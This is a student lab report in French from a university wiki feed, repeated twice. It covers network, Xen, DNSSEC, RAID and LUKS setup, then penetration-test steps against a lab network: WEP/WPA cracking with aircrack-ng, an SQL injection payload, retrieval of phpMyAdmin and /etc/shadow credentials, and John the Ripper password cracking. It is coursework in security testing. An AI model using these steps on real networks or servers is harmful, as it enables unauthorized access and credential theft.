         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;br /&gt;
&lt;br /&gt;
=== ASR ===&lt;br /&gt;
&lt;br /&gt;
 xl create -c PRA-07.cfg&lt;br /&gt;
&lt;br /&gt;
 xen console PRA-07&lt;br /&gt;
&lt;br /&gt;
on ajoute dans /etc/network/interfaces :&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 172.26.145.107/24&lt;br /&gt;
  gateway 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Et on commente relatif au DHCP&lt;br /&gt;
on édite /etc/ssh/sshd_config :&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
on copie la clé publique de la zabeth dans /root/.ssh/authorized_key&lt;br /&gt;
&lt;br /&gt;
on install puthon3-venv sur la zabeth :&lt;br /&gt;
 apt install python3-venv&lt;br /&gt;
&lt;br /&gt;
on install ansible sur les zabeth :&lt;br /&gt;
 python3 -m venv ~/env-ansible&lt;br /&gt;
 . ~/env-ansible/bin/activate&lt;br /&gt;
 pip3 install -U setuptools wheel&lt;br /&gt;
 pip3 install -U ansible&lt;br /&gt;
&lt;br /&gt;
On édite le fichier inventory de ansible :&lt;br /&gt;
 ASR-07 ansible_ssh_host=&amp;quot;172.26.145.107&amp;quot;&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57897</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57897"/>
				<updated>2022-01-12T10:18:32Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* ASR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
